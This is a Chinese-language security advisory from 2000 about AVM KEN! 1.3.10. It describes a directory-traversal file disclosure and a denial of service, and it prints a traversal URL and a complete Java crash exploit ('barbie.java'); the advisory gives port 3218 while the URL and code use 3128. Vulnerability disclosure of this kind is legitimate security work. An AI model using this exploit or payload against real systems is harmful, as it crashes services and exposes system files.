安全研究

安全漏洞
AVM KEN! 1.3.10可能泄漏系统文件

发布日期:2000-04-14
更新日期:2000-04-14

受影响系统:

AVM KEN! 1.3.10
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
描述:

远程用户可以浏览正在运行AVM KEN!的远程主机上的任意已知文件。攻击者只要向3218端口
发送包含有"../"字符的URL,就可以绕过web文件结构的限制获取系统文件。例如:


http://target:3128/../../../filename.ext

另外,通过向3218端口发送随机字符,可以导致对AVM KEN!的拒绝服务攻击。要想恢复正常
工作,必须重新启动服务。



<* 来源:eAX <eax@mad.scientist.com>  *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


-----8<-----------8<------barbie.java -----8<-----------8<-----------

import java.net.Socket;
import java.io.*;

/*
BARBIE - The AVM KEN! exploit

This exploit causes a crash in the AVM KEN! ISDN Proxy software.
All conections will be cut off, but the server will restart again,
a few seconds later.

Tested with AVM KEN! Version 1.03.10 (german)
*/

class barbie {

String adress;

public void killken() {
PrintWriter out = null;
try{
    Socket connection = new Socket( adress, 3128);
    System.out.println("");
    System.out.println("killing...");
    out  = new PrintWriter(connection.getOutputStream(), true);
    out.println("Whooopppss_Ken_died");
    connection.close();
   }
catch (IOException e)
{
System.out.println("");
System.out.println(" Can't met Ken! ");
}  
}


public static void main (String arguments[]) {
barbie kk = new barbie();
if(arguments.length < 1)
{
System.out.println("");
System.out.println("usage: java barbie <adress/ip>");
System.exit(1);
}
kk.adress = arguments[0];
kk.killken();
}

}

----->8----------->8------ end ----->8----------->8-----------

建议:

暂无


浏览次数:6523
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障